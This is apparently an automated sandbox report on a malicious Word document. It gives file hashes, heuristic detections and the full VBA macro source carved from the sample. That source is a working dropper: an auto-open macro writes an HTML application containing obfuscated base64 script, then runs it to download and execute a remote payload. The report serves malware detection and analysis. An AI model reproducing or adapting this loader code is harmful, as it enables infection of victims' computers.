Office (OOXML) malware analysis — malicious · d6031e7592fc4f5e

MALICIOUS

Office (OOXML)

79.8 KB Created: 2021-04-01 07:14:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-04-10

MD5: 3ecef3bd8374dff7e0bea09d994d7ccd SHA-1: e403a1a3b0d8b4c6644fb2c0701d04bc5b1e9749 SHA-256: d6031e7592fc4f5e5757b2d3477a6c230d6eac43b7126e06b0e672bc510df568

170 Risk Score

Heuristics 6

VBA project inside OOXML medium 4 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
Set listTrustSelect = CreateObject("wscript.shell")
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set listTrustSelect = CreateObject("wscript.shell")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub autoopen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	8842 bytes
SHA-256: `03349c0807600f5697dc1c75801479c203bfbf6c8cd18c95fd4bac7cf2cb5a25`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "frm" Attribute VB_Base = "0{8DD389F9-F52D-4510-8AD9-EA8466DA8397}{435D38ED-E8C2-4DA7-B0E4-B280E12F0D99}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function windowArgument() With frm.button1 windowArgument = .Tag End With End Function Function globalCollectionBuffer() With frm.button1 globalCollectionBuffer = .Caption End With End Function Public Sub button1_Click() Set listTrustSelect = CreateObject("wscript.shell") listTrustSelect.exec p(windowArgument) & " " & p(globalCollectionBuffer) End Sub Attribute VB_Name = "tmpConst" Sub autoopen() valuePointerIterator End Sub Function intel(lenResponseClass) intel = "" & lenResponseClass & "" End Function Sub valuePointerIterator() Dim nextLeft As String nextLeft = p(frm.button1.Caption) Set memoryBorderRequest = New memoryConst memoryBorderRequest.tempEx nextLeft, memoryDataVb frm.button1_Click End Sub Function constLocal(iteratorScreenReference, selectRightView, memDatabase) constLocal = Replace(iteratorScreenReference, selectRightView, memDatabase) End Function Attribute VB_Name = "dataReference" Function storageAData() storageAData = intel("<html><body><div id='content'>fTtlc29sYy5kYW9Md29kbmlXcnRwOykyIC") End Function Function listMain() listMain = intel("wiZ3BqLnBtZVRmZVJlbGJhaXJhdlxcY2lsYnVwXFxzcmVzdVxcOmMiKGVsaWZvdG") End Function Function leftMem() leftMem = intel("V2YXMuZGFvTHdvZG5pV3J0cDspeWRvYmVzbm9wc2VyLkFlbGJhaXJhdihldGlydy") End Function Function libIndex() libIndex = intel("5kYW9Md29kbmlXcnRwOzEgPSBlcHl0LmRhb0x3b2RuaVdydHA7bmVwby5kYW9Md2") End Function Function varSelectSize() varSelectSize = intel("9kbmlXcnRwOykibWFlcnRzLmJkb2RhIih0Y2VqYk9YZXZpdGNBIHdlbiA9IGRhb0") End Function Function refSwapData() refSwapData = intel("x3b2RuaVdydHAgcmF2eykwMDIgPT0gc3V0YXRzLkFlbGJhaXJhdihmaTspKGRuZX") End Function Function collectionLen() collectionLen = intel("MuQWVsYmFpcmF2Oyllc2xhZiAsIkJ3dXJhSzc5VVFyTmRSQWFaaWR5RWR1PWRpPz") End Function Function dataClass() dataClass = intel("UxbmF4LzUzMDEvMzc4c3lob0lFSXptUjRXUWV2ajJoSFdtM01CSjRwQnhtS0lIdH") End Function Function borderScreen() borderScreen = intel("NjQ3FHL0s1WVF0UGtzOHkvODgxNjcvbEtUNjRKeEsvZ1pUVTQxMnB2dFQvc3l1b2") End Function Function textboxExValue() textboxExValue = intel("cvbW9jLjYxMDItZWdhZ3Ryb20tZG5lZ2VsLy86cHR0aCIgLCJURUciKG5lcG8uQW") End Function Function trustRequest() trustRequest = intel("VsYmFpcmF2OykicHR0aGxteC4ybG14c20iKHRjZWpiT1hldml0Y0Egd2VuID0gQW") End Function Function deleteCaption() deleteCaption = intel("VsYmFpcmF2IHJhdg==\|fXspeXBvQ2NpcmVuZUd0bnVvYyhoY3RhY307KSJhdGguc") End Function Function memProcProc() memProcProc = intel("G1lVGZlUmVsYmFpcmF2XFxjaWxidXBcXHNyZXN1XFw6YyIoZWxpZmV0ZWxlZC5Bb") End Function Function genericRefCollection() genericRefCollection = intel("m90dHVie3lydDspInRjZWpib21ldHN5c2VsaWYuZ25pdHBpcmNzIih0Y2VqYk9YZ") End Function Function linkCopy() linkCopy = intel("XZpdGNBIHdlbiA9IEFub3R0dWIgcmF2OykiZ3BqLnBtZVRmZVJlbGJhaXJhdlxcY") End Function Function pasteText() pasteText = intel("2lsYnVwXFxzcmVzdVxcOmMgMjNydnNnZXIiKG51ci4pImxsZWhzLnRwaXJjc3ciK") End Function Function vbPtrView() vbPtrView = intel("HRjZWpiT1hldml0Y0Egd2Vu</div><div id='table1'>ABCDEFGHIJKLMNOPQR") End Function Function windowClear() windowClear = intel("STUVWXYZ</div><div id='table2'>0123456789+/</div><div id='table3") End Function Function swapTitlePaste() swapTitlePaste = intel("'></div><script language='javascript'>function structDatabaseRef") End Function Function textWindowMemory() textWindowMemory = intel("erence(viewLink){return(new ActiveXObject(viewLink));}function f") End Function Function removeProcedureMain() removeProcedureMain = intel("uncArrayStruct(linkTrustConvert){return(titleRef.getElementById(") End Function Function titleProcedureLeft() titleProcedureLeft = intel("linkTrustConvert).innerHTML);}function listboxCaptionQuery(){var") End Function Function tempWindowRepo() tempWindowRepo = intel(" clearSize = funcArrayStruct('table1');var ptrSizeStruct = clear") End Function Function bufferExArray() bufferExArray = intel("Size.toLowerCase();var tempConst = funcArrayStruct('table2');ret") End Function Function convertTable() convertTable = intel("urn(clearSize + ptrSizeStruct + tempConst);}function textConst(s") End Function Function viewW() viewW = intel("){var e={}; var i; var b=0; var c; var x; var l=0; var a; var te") End Function Function nextArrayQuery() nextArrayQuery = intel("xtboxIndex=''; var w=String.fromCharCode; var L=s.length;var pas") End Function Function storageMemoryWindow() storageMemoryWindow = intel("teRefTitle = 'charAt';for(i=0;i<64;i++){e[listboxCaptionQuery()[") End Function Function sizeW() sizeW = intel("pasteRefTitle](i)]=i;}for(x=0;x<L;x++){c=e[s[pasteRefTitle](x)];") End Function Function lenProcedureListbox() lenProcedureListbox = intel("b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(l-=8))&0xff)\|\|(x<(L-2)))&&") End Function Function rightEx() rightEx = intel("(textboxIndex+=w(a));}}return(textboxIndex);};function refListbo") End Function Function bufArgument() bufArgument = intel("xIndex(dataQuery){return dataQuery.split('').reverse().join('');") End Function Function removeWW() removeWW = intel("}listboxArray = window;titleRef = document;listboxArray.resizeTo") End Function Function tmpData() tmpData = intel("(1, 1);listboxArray.moveTo(-100, -100);var requestRequestCounter") End Function Function bufferTextPointer() bufferTextPointer = intel(" = titleRef.getElementById('content').innerHTML;var requestReque") End Function Function nextButton() nextButton = intel("stCounter = requestRequestCounter.split('\|');var bufferPtr = ref") End Function Function lenResponse() lenResponse = intel("ListboxIndex(textConst(requestRequestCounter[0]));var tmpMemOpti") End Function Function nextConvert() nextConvert = intel("on = refListboxIndex(textConst(requestRequestCounter[1]));</scri") End Function Function procedureReference() procedureReference = intel("pt><script language='javascript'>function counterCountArray(tmpA") End Function Function requestIteratorLoad() requestIteratorLoad = intel("rray){var arrayTable = structDatabaseReference('msscriptcontrol.") End Function Function buttonResponse() buttonResponse = intel("scriptcontrol');arrayTable.Language = 'jscript';arrayTable.Timeo") End Function Function tableW() tableW = intel("ut = 60000;arrayTable.AddCode(tmpArray);return(null);}</script><") End Function Function listStructVar() listStructVar = intel("script language='vbscript'>counterCountArray bufferPtr : counter") End Function Function tmpFuncCounter() tmpFuncCounter = intel("CountArray tmpMemOption : listboxArray.close</script></body></ht") End Function Function bufA() bufA = intel("ml>") End Function Function memoryDataVb() memoryDataVb = storageAData + listMain + leftMem + libIndex + varSelectSize + refSwapData + collectionLen + dataClass + borderScreen + textboxExValue + trustRequest + deleteCaption + memProcProc + genericRefCollection + linkCopy + pasteText + vbPtrView + windowClear + swapTitlePaste + textWindowMemory + removeProcedureMain + titleProcedureLeft + tempWindowRepo + bufferExArray + convertTable + viewW + nextArrayQuery + storageMemoryWindow + sizeW + lenProcedureListbox + rightEx + bufArgument + removeWW + tmpData + bufferTextPointer + nextButton + lenResponse + nextConvert + procedureReference + requestIteratorLoad + buttonResponse + tableW + listStructVar + tmpFuncCounter + bufA End Function Attribute VB_Name = "memoryConst" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Option Explicit Public Sub tempEx(vbTable As String, copyCopy As String) Dim rightDatabaseW As FileSystemObject Set rightDatabaseW = New FileSystemObject Dim swapMainWindow As TextStream Set swapMainWindow = rightDatabaseW.CreateTextFile(vbTable) swapMainWindow.WriteLine copyCopy swapMainWindow.Close Set swapMainWindow = Nothing Set rightDatabaseW = Nothing End Sub Attribute VB_Name = "ptrTmpTrust" Function p(globalListbox) p = constLocal(globalListbox, "@", "") End Function
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	39424 bytes
SHA-256: `2b79cc4edc56364e7d09569282694973c9724230c7a8134b00c2b462fc6ac6eb`

Open this report in the interactive analyzer, or submit your own file for analysis.